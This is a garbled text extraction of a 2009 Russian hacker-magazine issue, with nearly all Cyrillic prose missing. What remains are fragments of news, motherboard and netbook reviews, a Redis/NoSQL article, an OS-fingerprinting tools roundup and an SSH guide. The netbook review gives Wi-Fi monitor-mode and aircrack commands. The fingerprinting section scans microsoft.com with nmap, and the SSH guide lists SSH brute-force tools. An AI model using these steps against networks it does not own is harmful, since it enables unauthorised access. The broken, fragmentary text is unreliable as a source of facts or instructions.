Академический Документы
Профессиональный Документы
Культура Документы
56
x 08 () 2009
.
210
:
08 (128) 2009
. 46
START
SQL!
fingerprinting
128
. 26
SQL
. 20
PCI DSS
. 52
, . , ,
?
,
,
, / .
,
: ,
,
.
? ,
. ,
CD
96 , , ,
. , , .
, ,
, , .
P.S. , : vkontakte.ru/
club10933209, .
.
. , ..
5-6
.
nikitozz, . .
nikitoz@glc.ru
udalite.livejournal.com
vkontakte.ru/club10933209
CONTENT
08(128)
004 MEGANEWS
FERRUM
018
PC_ZONE
030
SQL
SSH'
040
060
064
076
082
110
PCI DSS
SYN/ACK
116
121
twitter-
X-TOOLS
070
106
066
socks-
Pythone
EASY-HACK
056
102
052
098
, SQL!
036
046
092
GUI PYTHON!
026
088
014
020
126
130
132
SCCM:
IT-
IN DA FOCUS
136
140
MegaFAQ Linux
143
Linux VServer
Linux - 2009
PAM'
144
PSYCHO:
FAQ UNITED
FAQ
8.5
WWW2
web-
,
! .
, .
,
: ,
,
.
, :
,
, , ,
.
.
, security level
!
/
>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN\ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)
Dr. Klouniz
(alexander@real.xakep.ru)
Dlinyj
(dlinyj@real.xakep.ru)
>
(lyashchenko@gameland.ru)
/ART
>-
(novikov.e@gameland.ru)
>
(svetlyh@gameland.ru)
/DVD
>
Step
(step@real.xakep.ru)
> Unix-
Ant
>
/PUBLISHING
>
119021, , . ,
. 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>
>
>
>
>
>
>PR-
>
>
>
START
046
070
Fedora 11
Leonidas
102
>
>
(strekneva@gameland.ru)
>
> -
>
(andrey@gameland.ru)
>
(devald@gameland.ru)
>
(kosheleva@gameland.ru )
>
(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24
>
.: 8 (800) 200.3.999
>
101000, ,
, / 652,
,
77-11802 14
2002 .
Lietuvas Rivas, .
100 000 .
.
.
:
. ,
,
.
.
.
.
:
content@gameland.ru
, , 2009
.
_ssh3r1ff(ssh3r1ff@gmail.com). .
>> meganews
J3
PC27
PC27
J3
- ,
Apple .
2004 , ,
- ,
, . ,
!
Apple
, ,
. , ,
, excellent,
, ,
.
14%
21 .
, 300 ?
, , ,
,
MMOG. ,
, ,
. ,
, , , ( ). , .
,
.
. ,
MMORPG. , ,
:).
GOOGLE WAVE
100.000 30- (
).
004
X 08 /128/ 09
>> meganews
PC27
- ,
. ,
- , , ,
, . eMachines
( Acer) eMachines EZ1601-01
,
:
$400. ,
,
... . Intel Atom N270 (1.6 ),
Intel GMA 950, 1
(DDR2-533 ), 160
(SATA), ,
8x DVDR/RW DL SuperMulti.
. ,
, , , 18.5.
. C :
,
.
.
PC27
POSITIVE TECHNOLOGIES
,
74%
PCI DSS.
TPB
, The
Pirate Bay , ,
. ,
,
, ,
http://thevideobay.
org.
YouTube, , ,
. ,
Flash, HTML 5
<video> <audio>. ,
(, IE
).
, VideoBay : Firefox
3.5, Opera 9.52 preview, Google Chrome 3,
Safari 3.4 Safari 4.
.
Usenet
, ( ) Pirate Bay .
, .
, , , Usenet. -, ,
( 80-
) . , , Usenet
, , ,
. RIAA
, - ,
2007 Usenet.com Inc.
- -.
, .
, ,
\ Usenet.com.
006
X 08 /128/ 09
>> meganews
PC27
J3
GMail
SMS.
,
Google ,
SMS
.
: GMail
,
,
.
,
, ,
help, Google
-
(
).
help ,
. -
!.
,
( ,
,
, IP),
,
.
IDC , 2008
67%.
Sony
, . Sony
10- VAIO
W.
Sony :
, .
.
: Intel Atom
N280 1.66 , 1 , 160
, - 3.1 , Bluetooth, Wi-Fi 802.11
b/g/n, LAN USB-. 10.1 ( 16:9), 1366768
. 3 .
$499.
.
MESSAGELABS,
90.4%.
5- , Production Godskitchen
Camel Urban Wave, Camel Zeppelin Production. ,
, ,
. -
: , , .
008
X 08 /128/ 09
>> meganews
Google Chrome OS
Nero, Google.
,
,
,
.
, :
,
Chrome OS
2010 . Linux,
x86 ARM . Chrome OS
, , open source
! ,
- , . Android Chrome OS
, ,
.
, Google .
.
, ,
. -
, . fail SGAE,
. , SGAE eD2K-
elrincondejesus.com.
, - . P2P-, , ,
,
. . ,
,
. , . ,
, .
Trend Micro , Symbian OS.
, Symbian Foundation,
. . ,
, Sexy Space,
ACSServer.exe, , ,
.
, ,
. ,
SMS-
.
Fanta
Fanta Fanta
. :
, ,
50 !
Fanta 0,5 ., 1 .
2 . .
X 08 /128/ 09
009
>> meganews
? ?
Google GMail ,
Labs .
eBay PayPal,
.
DKIM,
, , ,
.
.
(
, , ,
).
15- MICROSOFT
MICROSOFT OFFICE 2000,
10 .
Microsoft coming
soon
Apple, , Microsoft
, .
,
,
- Microsoft Worldwide Partner Conference.
Microsoft ,
Windows 7. ,
Apple,
, , . Microsoft
,
, .
010
X 08 /128/ 09
>> meganews
Project Natal
Windows
, Microsoft E3. Project Natal
X-Box 360,
. Natal
,
( )
, , .
,
,
. Microsoft , Natal Windows . ,
,
(, , ,
, ), .
.
!
,
,
,
, , ,
. ? , ,
.
Nokia,
INTERPRET ,
X 08 /128/ 09
36% .
11
30 Windows 7, ,
, . ? , !
, .
Velle - ,
.
:
Velle
Velle
Velle ,
VITAVEN, Velle
www.velleoats.com
X 07 /127/ 09
053
>> ferrum
:
, . ,
(, ) , . - , -
,
, , Intel X58.
,
58, LGA1366. ,
Intel Nehalem
DDR3 (),
. QPI
25.6 /.
ICH10R
6 PCIe x1 12 USB.
nVidia SLI,
Intel.
,
, nVidia .
, , SLI . ,
,
,
. 36 PCI-E 2.0,
, 3-way
SLI PCI-E 8x. ,
, ,
16 ,
,
nVidia nForce 200, 16 PCI-E.
,
, .
014
,
. , 6
Kingston, JEDEC (
1.5, 1333 , 9-9-9-24).
:
Lavalys Everest 5 ( )
Passmark Perfomance Test 6.1.
Microsoft Windows XP SP3,
BIOS
.
,
,
LAVALYS EVEREST
MSI Eclipse SLI
Intel DX58SO
Gigabyte EX58-Extreme
ECS X58B-A
Everest memory
benchmarkCopy(M/)
Everest memory
benchmarkWrite(M/)
Everest memory
benchmarkRead(M/)
X 08 /128/ 09
>> ferrum
ASRock X58
Deluxe
7520 .
:
: Intel X58 Express, Intel ICH10R
: DDR3 800/1066/1333/1600/1866/2000
non-ECC
BIOS: AMI BIOS
: PCI (3 .), PCI-E x16 (4.)
: 24- 8- , 5
( ),
IEEE1394a, USB 2.0 (3 .), IR, -
, CD-in, COM, HDMI-S/PDIF
: SATA 2.0 (6 .), IDE, Floppy
RAID: 0/1/5/10, Intel Matrix Storage
: PS/2, S/PDIF ( ), RJ-45, IEEE1394a, USB 2.0 (6 .), eSATA, MiniJack 3.5 mm (6 .)
: Realtek ALC890
: Realtek RTL8111DL
. BIOS ,
.
X 08 /128/ 09
ASUS P6T6 WS
12500 .
Revolution
:
: Intel X58 Express + NVIDIA nForce 200,
Intel ICH10R
: DDR3 800/1066/1333/1600/1866/2000
non-ECC
BIOS: AMI BIOS
: PCI-E x16 (3 .), PCI-E x8 (2 .), PCI-E x4 (1 .)
: 24- 8- , 5
( ),
IEEE1394a, USB 2.0 (3 .), IR, -
, CD-in
: SATA 2.0 (6 .), SAS (2 .)
RAID: 0/1/5/10
: PS/2, S/PDIF( ), RJ-45, IEEE1394a, USB 2.0 (6 .), eSATA (2 .), MiniJack 3.5 mm (6
.)
: Realtek ALC890
: Realtek RTL8111DL
Revolution
! , LPT COM,
PCI IDE.
PS/2. : PCI-E 2.0, eSATA,
SATA II SATA\SAS.
,
molex.
PCI-Express 2.0 16
nVidia nForce 200.
8, 4.
, , ,
,
.
015
>> ferrum
10600 .
8100 .
ECS Black
X58B-A
:
: Intel X58 Express, Intel ICH10R
: DDR3 800/1066/1333/1600 non-ECC
BIOS: AMI BIOS
: PCI (1 .), PCI-E x16 (2 .), PCI-E x4 (1 .),
PCI-E x1 (2 .)
: 24- 8- , 5
( ),
IEEE1394a, USB 2.0 (3 .), IR, -
, CD-in, IEEE1394a, S/PDIF,
: SATA 2.0 (6 .), eSATA 2 .
RAID: 0/1/0+1/5
: PS/2, RJ-45, IEEE1394a, USB 2.0 (6 .),
eSATA (2 .), MiniJack 3.5 mm (6 .)
: Realtek ALC888S-VC
: Realtek RTL8111C
Gigabyte
GA-EX58-Extreme
:
: Intel X58 Express, Intel ICH10R
: DDR3 800/1066/1333/2100+ nonECC
BIOS: Award BIOS
: PCI (2 .), PCI-E x16 (2 .), PCI-E x1 (1 .),
PCI-E x4 (1 .), PCI-E x8 (1 .)
: 24- 8- , 4
( ),
IEEE1394a (2 .), USB 2.0 (2 .), - , CD-in
: SATA 2.0 (10 .), IDE, Floppy
RAID: 0/1/5/10
: PS/2, S/PDIF( ), RJ-45 (2 .), IEEE1394a, USB 2.0 (8 .), MiniJack 3.5 mm (6 .)
: Realtek ALC889
: Realtek RTL8111D
. , , , .
, , -, POST-, Power
Reset, , BIOS,
, , .
.
eSATA,
USB FireWire.
PCI-Express 2.0 x16, PCI 2.0, PCI-Express
x4 PCI Express x1.
,
(
), . , , Gigabyte,
Ultra Durable 3.
, ,
. , Power
Reset, POST-, , ,
, BIOS.
, 10 SATA 2.0 .
,
Intel VRD 11.1
,
PCI-Express.
016
X 08 /128/ 09
>> ferrum
8050 .
10600 .
Intel
DX58SO
:
:
: Intel X58 Express, Intel ICH10R
: DDR3 800/1066/1333/1600 non-ECC
BIOS: AMI BIOS
: PCI (1 .), PCI-E x16 (2 .), PCI-E x4 (1 .)
: 24- 8- ,
5 ( 2 ),
IEEE1394a, USB 2.0 (2 .), IR, -
: SATA 2.0 (6 .)
RAID: 0/1/5/10
: S/PDIF (), RJ-45,
IEEE1394a, USB 2.0 (8 .), eSATA (2 .), MiniJack 3.5 mm (6 .)
: Realtek ALC889
: Realtek RTL8111D
Intel, ,
,
. , ,
(4 ). ,
. PS/2 ,
eSATA. IDE
, SATA-. ,
PCI-Express x1, PCI-Express x16 4.
,
. ,
BIOS, (Power Slope),
.
BIOS .
, ,
, , .
, ,
.
,
, , -
.
Gigabyte
GA-EX58-Extreme,
X 08 /128/ 09
M Eclipse
MSI
S
SLI
:
: Intel X58 Express, Intel ICH10R
: DDR3 800/1066/1333/1600 non-ECC
BIOS: AMI BIOS
: PCI (2 .), PCI-E x16 (3.), PCI-E x1
: 24- 8- , 6
( ),
IEEE1394a, USB 2.0 (2 .)
: SATA 2.0 (10 .), IDE
RAID: 0/1/5/10/JBOD, Intel Matrix Storage
: PS/2, RJ-45(Ethernet) 2 .,
IEEE1394a, USB 2.0 (8 .), eSATA 2 .
:
Creative Sound Blaster X-Fi Xtreme Audio
: Realtek 8111C (10/100/1000 /) 2 .
. ,
,
Creative Sound Blaster X-Fi Xtreme Audio,
. , GreenPower Genie,
BIOS MSI.
10 SATA, 2 eSATA\USB
.
POST-, , , .
.
,
(
, Intel
Core i7).
OCZ. , , , MSI, ,
.
.
Intel
DX58,
. ,
ASUS P6T6 WS Revolution
MSI Eclipse SLI. , ,
. ASUS
SAS nVidia nForce 200
. MSI
,
SATA. .z
017
>> ferrum
ASUS
Eee PC 1008HA
,
X-Toolz. ,
, . ASUS Eee PC 1008HA.
, , , : , !.
: 18 25,7 . ,
.
Eee PC 1008HA
. ,
, .
, 1.1 ,
, 10" 6
.
, ASUS .
Eee PC, ,
018
Python, .
. 1008HA
,
. ,
: ,
Shift . ,
,
14" .
(
1024 x 600) , ,
.
Visual Studio Eclipse.
X 08 /128/ 09
>> ferrum
. , , Eee PC ,
, SVN-,
.
. ,
:).
1008HA . Eee PC Intel Atom.
Atom N280 1,66 , 1
160 . Windows XP Home , - , Windows 7
. Release-candidate , Microsoft , -
. , ,
, .
VOIP
, . 13,
1008HA,
. , ,
.
VoIP- ,
.
, z SIP Skype.
1.3 , ,
. ,
-, ,
.
Bluetooth-. Bluetooth 2.1 EDR
.
?
. ,
,
. 1008HA ,
6
. - 2,900
(, ,
) ,
. , , ,
.
65%,
Komodo Edit
15% . ,
4,5-5 .
,
, . .
?
Intel Atom N280,
. 1,66
667 Intel GN40.
N270,
.
X 08 /128/ 09
,
.
, , - .
, Eee PC 1008HA
Intel. , Kismet Airocrack
.
Monitoring Mode, .
Wi-Fi Intel . 1008HA, , .
Linux
Backtrack4, ( ). ,
,
:
modprobe ath9k
airmon-ng start wlan0
airodump-ng wlan0
Wi-Fi,
airodump, . ,
, .
, ,
aircrack-ng.
!
, Eee PC ASUS
. ,
.
,
, . .
? !
ASUS
trendclub.ru. z
019
>> pc_zone
DATA
KEY
Fox
Hash
function
DFCD3454
Hash
function
52ED879E
Hash
function
46042841
DISTRIBUTED
NETWORK
PEERS
/ ALEKS.RAIDEN@GMAIL.COM /
, SQL!
SQL
? SQL, ? ,
. , , SQL . . !
, ,
, ? Google, Amazon,
eBay, Twitter, Facebook
? -,
PHP+mySQL. .
, , ,
.
, ,
. ,
,
, ,
. ,
(
#125
z ). ,
- ,
020
.
.
- . -.
: ,
, , ,
.
master-slave, BDSM !
, ,
,
. ,
, .
, ( ,
)?
: ,
? ,
,
,
.
(
master-master multi-master ),
,
.
,
.
,
. , ,
. ,
.
. .
SQL-!
,
,
. ?
!
? ( ,
)
,
SQL (, X 08 /128/ 09
>> pc_zone
-. ,
, / ( );
.
- - (DHT).
, ,
, ( ,
torrent).
,
, .
MEMCACHEDB
) .
, ?
,
.
, ,
(
) .
,
? !
, SQL,
,
.
, - , .
.
.
,
.
-, ?
key-value database!
,
. , ,
:
( ) ,
. ,
.
,
.
X 08 /128/ 09
get ( ),
set ( ), delete ( ), update (
).
,
,
( ,
)
.
, ( SQL
).
.., , , ,
,
.
key-value .
,
, , ,
,
(BLOB-),
. DHT ,
, .
.
, ! ,
, (
,
).
.
, , .
. ,
!
, , ,
. ! , ,
SQL-,
,
, .
- , .
021
>> pc_zone
HTTP://WWW
links
:
http://en.wikipedia.
org/wiki/Multimaster_replication.
Google:
http://highscalability.
com/googlearchitecture.
Google
:
http://labs.google.
com/papers/bigtable.
html.
DHT:
http://ru.wikipedia.
org/wiki/DHT.
Memcached:
http://danga.com/
memcached.
Facebook:
http://github.com/
fbmarc/facebookmemcached/tree/
master.
PHP
Redis-
:
http://code.google.
com/p/redis-ajaxchat.
022
(
SQL-
-). , .
, SQL,
, .
, SQL key-value , .
,
, , .
. MemcacheDB,
memcache BerkleyDB,
. ,
Redis
.
,
,
.
, !
! ,
.
Memcached/MemcacheDB (memcachedb.org) ,
key-value DB.
, ,
, .
, ,
, ,
.
UDP- ,
, , 1.4,
. Facebook , ,
! ,
Memcached- ! ,
. , , MemcacheDB,
. ,
( ),
.
Project Voldemort (project-voldemort.com)
, , .
Java .
.
, Project Voldemort JavaAPI , ,
Google ProtoBuf Thrift,
. ,
( ),
.
,
, , .
: 10-20
VOLDEMORT
PROJECT
, , LinkedIn ,
.
CLOUD
Apache CouchDB (couchdb.apache.org)
COMPUTING
! , CouchDB ,
-.
, , -.
, (), , ,
. , ,
. Apache
CouchDB Erlang ( , ) HTTP
REST- JSON API,
JavaScripta- -!
, ,
? , JavaScript SQL.
,
. , .
Redis (code.google.com/p/redis)
,
! ?
. 100
. ,
Redis , , .
, ,
( -),
( !) .
, memcached ,
- , Redis-
! ,
key-value ( SQL,
). ANSI C
(
BSD),
. TCP
telnet. , API
. ,
- PHP, ! :)
TWITTER?!
, , ,
,
X 08 /128/ 09
>> pc_zone
VOLDEMORT
(, ,
).
. , (Twitter)
X 08 /128/ 09
.
,
.
(
).
Redis.
,
HTML- ,
,
.
0. , .
( ,
), ,
() , ( ,
).
1.
-,
,
(
, , ),
, , ,
.
JSON
,
JSON . SET
admin {name:supervasya,age:21,sex:m,re
025
>> pc_zone
COUCHDB
gistered:27.07.2009} admin.
, GET admin, JSON- .
: SET admin_pass
md5(password) , _pass, md5 .
( ,
). , : EXISTS admin,
(, ),
: GET admin_pass. . ( SELECT COUNT() ): INCR
count_user 1.
,
, , (set): SADD
all_user_list admin. , all_user_list
, .
2. . ,
, -
( !). , , , admin_11232142135,
: SET
admin_11232142135 {author:admin,text: ! ,time:
11232142135,title:!}. ,
,
. : RPUSH admin_msgs 11232142135.
admin_msgs . ?
,
, .
,
.
3. () , .
, : RPUSH admin_follow vasja. admin_follow
, admin.
, , :
RPUSH vasja _follow admin.
4. .
, . , , , .
, .
024
, .
. , .
( ): LLEN admin_follow. ,
2 ( ):
LRANGE admin_follow 0 1 .
, ,
.
.
, ,
. , N
LRANGE,
( + _msgs). ,
, Redis- ,
. ,
KEYS,
. ,
( , ).
(
,
).
,
, .
, JSON-
, 3600 (
). , 100,
.
+ , (,
),
login_time ( , Redis-e), .
, , ,
array_merge , array_sort.
,
SQL-.
,
.
Redis-
, .
,
memcached (
) MGET _,
X 08 /128/ 09
>> pc_zone
: MS SQL ,
, SQL Shield
COUCHDB
SysComments Decryptor ,
, .
,
JSON- .
-, JSON
AJAX-. JSON
,
.
admin_follow,
, , MGET, ,
.
.
admin_follow ,
LREM, ,
.
?
(SQL ) ,
,
.
,
,
. !
,
, SQL-,
- . , ,
, !
, Redis MemcachedDB, ,
- , , (
, -, )
key-value ! ,
, ! SQL-
.z
X 08 /128/ 09
025
9
TOOLS
9
TOOLS
>> pc_zone
9
TOOLS
9
TOOLS
STEP
/ STEP@GLC.RU /
9
TOOLS
9
TOOLS
9
TOOLS
9
TOOLS
9
TOOLS
9
TOOLS
9
9
TOOLS
TOOLS
9
TOOLS
9
TOOLS
9
TOOLS
9TOOLS
z . ,
, , . . ,
. , , fingerprinting.
. ,
. , ,
.
, ,
(, ,
),
, ,
, ,
.
fingeprinting,
.
fingerprinting
: FIN-, ICMP ,
ICMP TCP-.
TCP/IP
. .
, .
, TTL (
), DF ( ), TOS
(Type-Of-Service) ..
fingerprinting-
. , DF
( OpenBSD),
, DF ( ).
TTL: FreeBSD
Linux 64. ,
OS
026
, .
,
.
fingerprinting .
,
fingerprinting.
Nmap
http://nmap.org
: Unix, MacOS,
Win32
, fingerprinting
Nmap.
, -
,
, . , c
. , Nmap ,
OS Fingerprinting (
-O). ,
Nmap
. microsoft.com :).
nmap -O -PN microsoft.com
Starting Nmap 4.76 ...
Running (JUST GUESSING) : OpenBSD
4.X (86%)
Aggressive OS guesses: OpenBSD
4.3 (86%)
Nmap:
nmap -O -PN microsoft.com
Starting Nmap 5.00 ...
Running (JUST GUESSING) :
Microsoft Windows 2003 (91%)
Aggressive OS guesses: Microsoft
Windows Server 2003 SP2 (91%)
,
NMAP
-
.
, zenmap
X 08 /128/ 09
9
TOOLS
9
TOOLS
9
TOOLS
9
TOOLS
9
TOOLS
9
TOOLS
9
TOOLS
.
,
, , advanced
. ,
.
Intense
scan , . -,
Nmap
, embedded. MAC Asustek. 80
HTTP-,
,
WL500gP!
:). 5.00
,
,
.
MSRPC/
NetBIOS ,
,
.
Ncat, ,
.
,
,
Ndiff. , . -
,
,
.
p0f v2
camtuf.coredump.cx
: Unix, MacOS,
Win32
Nmap,
fingerprinting, p0f
. .. - ,
. , - IDS ( ).
p0f
, :
,
( SYN );
, (
SYN+ACK);
, ( RST+), - ,
;
X 08 /128/ 09
9
TOOLS
9
TOOLS
9
TOOLS
P0F
,
( -
).
,
NAT, ,
. p0f
, ,
Nmap
. , ,
- .
lookup, , ARIN-
!
p0f ,
(
),
.
,
.
lcamtuf.
coredump.cx/p0f-help , ,
.
THC-Amap
thc.org/thc-amap
: Unix, MacOS,
Win32
, , .
( Nmap), ,
, .
,
: ,
FTP 21, SSH 22 .. ,
, .
,
.
, ..
FTP-, 31337 ,
. !
Amap
TH. ,
>> pc_zone
9
TOOLS
. , ,
. ,
, .
SSH-, 988
, -, 29-.
Amap , .
Nmap.
: Nmap, ,
,
THC-Amap, .
:
#nmap -sS -oM results.nmap -p
1-65535 IP-
#amap -i results.nmap -o results.
amap -m
,
, - .
httprint
www.net-square.com
/httprint
: Linux, MacOS,
FreeBSD, Win32
,
. ,
HTTP , , -
027
9
TOOLS
9
TOOLS
>> pc_zone
9
TOOLS
9
TOOLS
9
TOOLS
9
TOOLS
9
TOOLS
9
TOOLS
9
TOOLS
9
9
TOOLS
TOOLS
9
TOOLS
9
NetworkMinerTOOLS
http://sourceforge.net/projects
/networkminer
: Windows
HTTP://WWW
links
fingerprint, p0f:
project.honeynet.org/
papers/finger.
ICMP fingerprint:
www.sys-security.
com/html/papers.
html.
DVD
dvd
fingerprint
DVD-.
NETWORKMINER
.
httprint.
. , , .
, , , (, mod_security.c)
ServerMask (www.port80software.com),
. Httprint .
Httprint ,
-. Apache, ISS -.
, , ADSL, .
SSL-, .
,
.
Nmap.
. , multi-threading
, .
, :
2005 .
,
Vista.
fingerprintinga?
fingerprinting .
, ,
.
, TCP/IP- . /proc/sys/net 64 . Windows RST (rst.void.ru) r57BF (broken fingers),
TCP/IP.
BSD-,
Sony Playstation 2 :).
028
. NetworkMiner
, PCAP.
,
.
,
, .
, NetworkMiner ,
, CLOUD
COMPUTING
.
,
( WLAN-
),
NetworkMiner ,
,
, .
TCP SYN SYN+ACK p0f Ettercap.
fingerprinting
DHCP-, Satori.
,
MAC-: Nmap.
ike-scan
www.nta-monitor.com/tools/ikescan
: Unix, MacOS, Win32
, ,
IKE-SCAN
VPN-.
IKE- . ,
VPN, ,
, ,
.
VPN- ike-scan . :
fingerprinting?. . VPN-,
.
fingerprinting, ike-scan,
X 08 /128/ 09
9
TOOLS
9
TOOLS
9
TOOLS
9
TOOLS
9
TOOLS
9
TOOLS
9
TOOLS
>> pc_zone
9
TOOLS
XPROBE2, UBUNTU
SATORI
SINFP
, ,
.
Xprobe2
xprobe.sourceforge.net
: Unix
. Xprobe2
fingerprinting,
Nmap , , .
honeypot TCP/IP.
. , . , pf,
OpenBSD ,
TTL, . TCP- ( -T) xprobe
.
UDP-, -U.
, Xprobe2
fingerprinting ICMP-.
, fuzzing , TCP/IP, . ,
, , Xprobe -
, ,
.
X 08 /128/ 09
Satori
http://myweb.cableone.net/xnih
: Windows, Linux
Satori ,
OC fingerprinting, , , .
,
WinPCap,
, .
Satori Windows,
HP ( HP Swith Protocol), Cisco (
CDP-). ,
Satori, , DHCP. ,
,
. . Satori,
SAM, ARP- .
SinFP
www.gomor.org/bin/view/Sinfp/WebHome
: Unix, Windows
SinFP ,
,
.
. , Nmap
TCP/IP-, SinFP
. Perl,
,
. CPAN: search.
cpan.org/~gomor/Net-SinFP. , SinFP
, . z
029
>> pc_zone
STEP
/ STEP@GAMELAND.RU /
SSH
FULL-GUIDE SECURE SHELL
! . SSH Telnet,
, , .
Secure Shell .
1:
SSH-
SSH,
.
PuTTY (www.chiark.greenend.org.uk)
SecureCRT (www.vandyke.com), .
, PuTTY .
. , ,
, UNIX.
, Visualhack++.
: Raw, Telnet, Rlogin, FTP (SFTP), SSH1,
SSH2. , PuTTY ,
030
(putty.exe) :
puttygen rsa/dsa ,
;
pagent ,
,
;
plink
putty;
pscp , ;
psftp ftp- , ,
..
.
PuTTY,
SecureCRT.
? , ,
. -
, PuTTY , ,
.
,
,
PuTTY Connection Manager (puttycm.free.
fr). , -
PuTTY,
,
. , SSH-
-
(putty.exe), PuTTY Connection Manager
, .
#
PuTTY.
:
X 08 /128/ 09
>> pc_zone
;
. ,
,
;
;
,
;
AES; , DLL-.
2:
/. ,
,
( ,
). PuTTY . PuTTY
SSH-,
,
. , ,
,
. .
Sessions.
IP- , , .
,
X 08 /128/ 09
. Connection
Data Auto-login username
(, UserAcc).
Sessions.
Saved Sessions ( ) , , session1, Save.
,
PuTTY, Saved Sessions, Load
Open. ,
. SSH
,
.
(/)
SSH- .
PuTTYgen,
. , ,
.
. OpenSSH
/.ssh/
authorized_keys2 :
mkdir ~/.ssh
chmod 700 ~/.ssh
vi ~/.ssh/authorized_keys2
ssh-dss AAAAB3NzaC1kc3MAAAE [.
. .] Huw2FekFNM7pMgEQi57k= dsakey-20061205
chmod 600 ~/.ssh/authorized_keys2
/
,
.
,
(SSH Auth Private key file
for authentification). ,
.
.
Pageant,
PuTTY.
,
sshproxy (sshproxy-project.org/
about), Python.
.
, ,
DMZ-.
SSH-,
sshproxy
.
,
, ,
.
3:
, SSH . .
, SSH-,
.
031
>> pc_zone
INFO
info
SSH:
SSH Brute
Forcer (www.
securiteam.com/
tools/5QP0L2K60E.
html)
SSHatter
(freshmeat.net/
projects/sshatter)
SSH BruteForcer
(www.darkc0de.com/
bruteforce)
THC Hydra (www.thc.
org/thc-hydra)
DVD
dvd
DVD.
SSH-
MOBASSH
FREESSHD
, .
.
PuTTY.
PuTTY :
Session Host Name (_ssh_), Port (22),
Protocol (SSH);
Connection/SSH/Tunnels, Add
new forwarded port, Source port (_
, , 666), Destination (___
:3306);
Local .
, 127.0.0.1 ,
Source Port (, 666).
unix- :
ssh -L666:___: -n
@_ssh_
MySQL, VNC-
..
4:
CLOUD
2-HOP TUNNEL
COMPUTING
Symbian:
PuTTY for Symbian OS (s2putty.sourceforge.net)
Windows Mobile:
PocketPuTTY (www.pocketputty.net)
Java:
MidpSSH (www.xk72.com/midpssh)
iPhone:
iSSH (www.zinger-soft.com)
myhome.example.org,
gateway.example.com, SSH-
server.example.com.
- .
myhome.example.org :
ssh -f -N -L 51526:server.example.com:22 -2
gateway.example.com
! , SSH- 51526
myhome.example.org
(server.example.com). ,
server.example.
com:22,
51526, SSH.
032
X 08 /128/ 09
>> pc_zone
WINSCP
:
REMOTE
DESKTOP SSH
,
,
49152-65535.
5:
SSH-
.
- OpenSSH,
. ( , , ..)
DropBear (matt.ucc.asn.au/
dropbear/dropbear.html). , ,
SSH- ,
. OpenSSH
DropBear ,
. , WinSSHD (www.bitvise.com/
winsshd). WinSSHD
MobaSSH (mobassh.mobatek.net)
. , SSH- ,
Install.
.
MobaSSH
,
, OpenSSH,
Cygwin.
(ls dir
..). .
/cygdrive.
,
UNC-:
//<LAN_WORKSTATION>, /registry.
X 08 /128/ 09
MobaHwInfo:
MobaSwInfo:
MobaTaskList, MobaKillTask:
TCPCapture:
scp, sftp:
ssh-
rsync, wget:
MobaSSH 100% .
,
freeSSHd (www.
freesshd.com). ; ,
, ,
.
cmd.exe. , ,
, ,
,
, , , SFT ..
6:
Plink, PuTTY.
,
, . :
plink my-ssh-session
. ,
.
, -
. -
,
MyEnTunnel (nemesis2.qx.net/pages/
MyEnTunnel).
SSH-. : Plink.
( ,
-
), MyEnTunnel
Plink.
. ,
:
Slow Polling MyEnTunnel . ,
,
Wine .
7:
SSH,
(Secure file
transfer), SFTP (SSH File Transfer Protocol)
SCP (Secure CoPy).
SSH,
:
, ,
,
.
033
>> pc_zone
WinSCP (www.winscp.
net). , .
,
, , . , WinSCP
Pageant
.
, - ?
, , ,
SSH. ExpanDrive (www.expandrive.com),
SFtpDrive,
, , , .
,
- :).
8:
: ,
, , .
.
Telnet/SSH
Tera Term (http://www.ayera.com/teraterm). ,
-, Web
Accept HTTP Connections.
,
, . SSH-,
, .
, WebShell
(www-personal.umich.edu/~mressl/webshell).
Python,
. Ajax,
, (,
).
9: RDP SSH
SSH- VNC RPD
. RPD-
WiSSH (www.wissh.com). WiSSH Gateway SSH-
: Windows 2000 Terminal Servers; Windows 2003 Terminal Servers;
Windows NT Terminal Server Edition; Windows XP Windows 2000/2003
Remote Desktop.
, .
10:
. PuTTY Connection Manager
,
. , . ClusterSSH
(clusterssh.sourceforge.net)
. SSH-
, .
, , , .. SSH-.
. ,
. ClusterSSH xterm
, Perl/TK.
11:
.
034
MYENTUNNEL , SSH-
, SSH1. OpenSSH :
vi /etc/ssh/sshd_config
[...]
Protocol 2
PasswordAuthentication no
UsePAM no
[...]
, . , Sshguard
(sshguard.sourceforge.net).
(syslog, syslog-ng, metalog, multilog, raw)
. IP- (pf, ipfw, netfilter/iptables hosts.
allow). sshd, dovecot, proftpd, pure-ftpd,
FreeBSD ftpd, UWimap (imap, pop). Fail2ban
(www.fail2ban.org) Sshdfilter (http://www.csc.liv.ac.uk/~greg/
sshdfilter).z
X 08 /128/ 09
>>
Easy Hack
R0ID
/ R0ID@MAIL.RU /
SKVOZ
:
( , ) , . ,
. , KardaTools,
, .
, , ,
.
Windows,
. ,
. , ,
.
1. HKEY_LOCAL_MACHINE\SOFTWARE\
MICROSOFT\WINDOWSNT\CURRENTVERSION\FONTSUBSTITUTES\,
:
"MS Shell Dlg" = "MS Sans Serif,204"
"MS Shell Dlg 2" = "MS Sans Serif,204"
2. HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\
WINDOWSNT\CURRENTVERSION\FONTMAPPER\ :
"ARIAL" = dword:000000cc
"DEFAULT" = dword:000000cc
3. HKEY_LOCAL_MACHINE\SYSTEM\
CURRENTCONTROLSET\CONTROL\NLS\CODEPAGE\ :
"1251" = "c_1251.nls"
"1252" = "c_1251.nls"
"866" = "c_866.nls"
"ACP" = "1251"
"OEMCP" = "866"
:
FLASH
:
Flash
. ,
,
USB-. : ? -,
Flash, Calculate
Linux Desktop (www.calculate-linux.ru). Gentoo Linux
036
"MACCP" = "10007"
"OEMHAL" = "vga866.fon"
, , . WinXP .
1. .reg :
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\
CodePage]
"1252"="c_1251.nls"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\FontSubstitutes]
"Arial,0"="Arial,204"
"Comic Sans MS,0"="Comic Sans MS,204"
"Courier,0"="Courier New,204"
"Microsoft Sans Serif,0"="Microsoft Sans Serif,204"
"Tahoma,0"="Tahoma,204"
"Times New Roman,0"="Times New Roman,204"
